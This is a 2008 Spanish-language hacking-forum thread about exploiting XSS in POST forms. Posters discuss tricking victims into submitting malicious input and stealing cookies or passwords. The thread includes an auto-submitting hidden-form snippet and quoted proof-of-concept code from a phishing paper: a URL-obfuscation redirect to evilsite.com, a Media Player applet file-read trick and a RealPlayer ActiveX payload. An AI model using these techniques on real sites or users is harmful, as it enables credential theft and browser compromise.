elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  explotar xss en formulario post
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: explotar xss en formulario post  (Leído 6,984 veces)
wizache

Desconectado Desconectado

Mensajes: 143


El que poco sabe poco vive


Ver Perfil WWW
explotar xss en formulario post
« en: 28 Enero 2008, 04:58 am »

Hola, ultimamente he tenido la oportunidad de trabajar en muchos bugs de xss sobretodo con el clasico link con codigo javascript que se envia por GET y se inyecta en la pagina, pero muchas veces no es tan facil explotar un bug ya que estos parametros se envian por post y hay que hacer que "la victima" haga click en un formulario y envie el "dato maligno".

Entonces quería abrir un tema sobre esto a ver que opinan o sus experiencias en bugs de este tipo todo en fin de la ciencia claro ;D.

Solo para aclarar hay que imaginar que tienes en x formulario un campo donde pones quiza tu nombre, una vez que le pones submit tu nombre aparece en la pagina, entonces si pones un <script>alert('hola mundo') </script> el famoso mensajito aparecera y si lo cambias por un script para robar por ejemplo las cookies, o peor si es un formulario de ingreso donde te puedan robar tu user y password.

Y la pregunta es como hacer que alguien caiga en este bug?
Algunas formas:
- Simplemente hacer un formulario con el parametro escondido donde meto el xss con su boton de submit(el problema seria la ingeniaria social que esto conlleva). 
- La otra es hacer el formulario con todos los campos ocultos y en vez del boton de submit poner un link que al hacer click corra un javascript que envie los datos del formulario, el problema es que la vicitma haga click en este link.
- Le envias por messenger el javascript y le dices que lo copie y  pegue en el formulario...
...esta bien ese ultimo es broma sobre todo cuando todos tus amigos creen que todo lo que le dices es para hackearlo   :xDjiji..

Que otras metodos se les ocurre para enviar parametros por post sin que la victima se de cuenta ?

Saludos
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: explotar xss en formulario post
« Respuesta #1 en: 28 Enero 2008, 14:18 pm »

Código
  1. <META HTTP-EQUIV="Refresh" CONTENT="0; URL=javascript:document.forms[0].submit()">
  2. <form method="POST" action="http://example.com">
  3. <input type="hidden" name="username" value="myuser">
  4. <input type="hidden" name="password" value="mypass">
  5. </form>

XSS es un ataque que hace uso de la explotación a través de una mala validación de caracteres, en sí, no es un bug.
En línea

wizache

Desconectado Desconectado

Mensajes: 143


El que poco sabe poco vive


Ver Perfil WWW
Re: explotar xss en formulario post
« Respuesta #2 en: 28 Enero 2008, 14:41 pm »

Código
  1. <META HTTP-EQUIV="Refresh" CONTENT="0; URL=javascript:document.forms[0].submit()">
  2.  
Ese no me lo sabia buen metodo

Saludos!
En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: explotar xss en formulario post
« Respuesta #3 en: 28 Enero 2008, 15:06 pm »


Alguien me decia que "hijacking cookies" es ya muy viejo a menos que sea un bank :D, veo ya muchos metodos interesantes y estudiando (solo estudiando) mas sobre  worms o algunos nuevos methods sobre bypass IDS and Sql injectios.

-berz3k.

En línea

дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.110


Ver Perfil WWW
Re: explotar xss en formulario post
« Respuesta #4 en: 1 Febrero 2008, 05:13 am »

Código
  1. <META HTTP-EQUIV="Refresh" CONTENT="0; URL=javascript:document.forms[0].submit()">
  2. <form method="POST" action="http://example.com">
  3. <input type="hidden" name="username" value="myuser">
  4. <input type="hidden" name="password" value="mypass">
  5. </form>

XSS es un ataque que hace uso de la explotación a través de una mala validación de caracteres, en sí, no es un bug.

En programación, cualquier error se le llama bug, cualquiera. La obligación del programador es limpiar todo tipo de caracteres que entren o salgan de su web.
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: explotar xss en formulario post
« Respuesta #5 en: 1 Febrero 2008, 20:47 pm »

Pero no todos los bugs son vulnerabilities ;).
En línea

Falso Positivo

Desconectado Desconectado

Mensajes: 243



Ver Perfil WWW
Re: explotar xss en formulario post
« Respuesta #6 en: 4 Febrero 2008, 12:01 pm »

Hola:
Lo siguiente fue extraido de un texto sobre phishing de NISR-WP
NGSSoftware Insight Security Research Page 19 of 42 http://www.ngsconsulting.com
2.3.7. Client-side Vulnerabilities
The sophisticated browsers customers use to surf the web, just like any other commercial piece of software, are often vulnerable to a myriad of attacks. The more functionality built into the browser, the more likely their exists a vulnerability that could be exploited by an attacker to gain access to, or otherwise observe, confidential information of the customer.
While software vendors have made great strides in methods of rolling out software updates and patches, home users are notoriously poor in applying them. This, combined with the ability to install add-ons (such as Flash, RealPlayer and other embedded applications) means that there are many opportunities for attack.
Similar to the threat posed by some of the nastier viruses and automated worms, these vulnerabilities can be exploited in a number of ways. However, unlike worms and viruses, many of the attacks cannot be stopped by anti-virus software as they are often much harder to detect and consequently prevent (i.e. the stage in which the antivirus product is triggered, is usually after the exploitation and typically only if the attacker tries to install a well known Backdoor Trojan or key-logger utility).

Example 1: Microsoft Internet Explorer URL Mishandling
By inserting a character (in this case 0x01 – represented as the escape encoded sequence %01) within the username section of the Friendly Login URL, a user would be redirected to the attackers server, but characters after the %01 would not be displayed in the browser URL field. Therefore this attack could be used to obfuscate the attackers full URL.

Sample HTML code:
l
Código:
ocation.href=unescape('http://www.mybank.com%01@evilsite.com/phishing/fakepage.htm');

Example 2: Microsoft Internet Explorer and Media Player Combination
A vulnerability existed within Microsoft Media Player that was exploitable through java coding with Microsoft Internet Explorer. This vulnerability enabled remote servers to read local customer files, browse directories and finally execution of arbitrary software. Depending upon the software being executed, the attacker had the potential to take control of the customer’s computer.
The problem lay with how Media Player downloaded customised skins and stored them. For example:
Código:
"C:/Program files/Windows Media Player/Skins/SKIN.WMZ" : <IFRAME
SRC="wmp2.wmz"></IFRAME>
Will download wmp2.wmz and place it in the defined folder. Unfortunately, the file wmp2.wmz may be a java jar archive. Therefore the following applet tag:
Código:
<APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media
Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>
Will be executed with codebase="file://c:/" and the applet will have read only access to C:\.
To execute this code automatically, all an attacker had to do was get the web browser to open a simple HTML fie such as the one below:
Código:
<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<SCRIPT>
The Phishing Guide
function f()
{
window.open("wmp7-bad.htm");
}
setTimeout("f()",4000);
</SCRIPT>
Which calls a secondary HTML file (wmp7-bad.htm)
<
Código:
APPLET CODEBASE="file://c:/"
ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class"
WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>

Example 3: RealPlayer/RealOne Browser Extension Heap Corruption

RealPlayer is the most widely used product for internet media delivery, with in excess of 200 million users worldwide. All popular web browsers offer support for RealPlayer and the automatic playing of media.
By crafting a malformed .RA, .RM, .RV or .RMJ file it possible to cause heap corruption that can lead to execution of an attacker’s arbitrary code. By forcing a browser or enticing a user to a website containing such a file, arbitrary attacker supplied code could be automatically executed on the target machine. This code will run in the security context of the logged on user.
Código:
<OBJECT ID="RealOneActiveXObject" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDC7A535-4070-4B92-
A0EA-D9994BCC0DC5"></OBJECT>
// Play a clip and show new status display
function clipPlay() {
window.parent.external.PlayClip(
"rtsp://evilsite.com/hackme.rm",
"Title=Glorious Day|Artist name=Me Alone")
}
More information is available from: http://www.nextgenss.com/advisories/realra.txt

Saludos.
« Última modificación: 14 Febrero 2008, 11:30 am por G4rBaG3 » En línea

Don't worry, be hacked....
nobuK

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: explotar xss en formulario post
« Respuesta #7 en: 12 Febrero 2008, 20:30 pm »

http://hyfank.awardspace.com/blog/?p=7

Bien explicadito y con codigo ya hecho para que puedas hacer un XSS en formularios POST  :)
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Aplicacion > Pagina web (Formulario POST) > DLL > EXE (Comprobador de Key)
Ingeniería Inversa
eclips 4 4,518 Último mensaje 8 Julio 2012, 20:15 pm
por apuromafo CLS
manda de nuevo los post del formulario al ir atras en el navegador y actualizar « 1 2 »
PHP
Ethgar 10 5,557 Último mensaje 11 Marzo 2015, 16:10 pm
por Ethgar
Error formulario POST PHP « 1 2 »
PHP
victorsnk 11 4,323 Último mensaje 19 Septiembre 2018, 09:59 am
por #!drvy
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines